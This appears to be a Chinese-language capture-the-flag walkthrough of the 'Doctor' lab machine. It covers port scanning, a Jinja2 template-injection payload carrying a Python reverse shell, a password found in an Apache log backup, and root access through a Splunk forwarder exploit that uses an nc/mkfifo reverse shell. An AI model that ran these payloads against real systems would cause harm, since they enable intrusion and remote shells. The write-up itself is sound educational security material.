基本信息

端口扫描

22,80,8089

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ nmap -sC -sV 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 13:25 CST
Nmap scan report for 10.10.10.209
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.82 seconds

80

一个医疗机构网站,给出了一个邮箱,info@doctors.htb,可以把这个域名加hosts

8089

8089是splunkd:

doctors.htb

1
10.10.10.209 doctors.htb

随意注册账号登录,进去有一个New Message功能:

页面有注释:

1
<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->

直接去访问http://doctors.htb/archive是空白

archive

尝试输入一些数据,提交后发现现实在archive中:

SSTI

尝试根据上面的响应进行闭合附加payload,可以确认存在SSTI:

SSTI exploit

提交payload然后去刷新archive,得到web用户shell:

payload

1
test3</title></item>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

log password

在/var/log/apache2目录下有一个backup文件,里面得到一个密码:

1
2
3
4
5
6
7
web@doctor:/var/log/apache2$ cat backup | grep pass
cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ pwd
pwd
/var/log/apache2
web@doctor:/var/log/apache2$

user flag

使用这个密码切换到shaun用户,得到user.txt:

提权信息

很容易发现splunkd是root权限启动的:

1
2
root        1130  0.8  2.0 257468 82956 ?        Sl   07:12   0:01 splunkd -p 8089 start
root        1132  0.0  0.3  77664 13380 ?        Ss   07:12   0:00 [splunkd pid=1130] splunkd -p 8089 start [process-runner]

搜到相关利用脚本:

提权 & root flag

1
python PySplunkWhisperer2_remote.py --lhost 10.10.14.8 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.14.8 5555 >/tmp/luci11"'

直接打到root shell,得到root.txt:

参考资料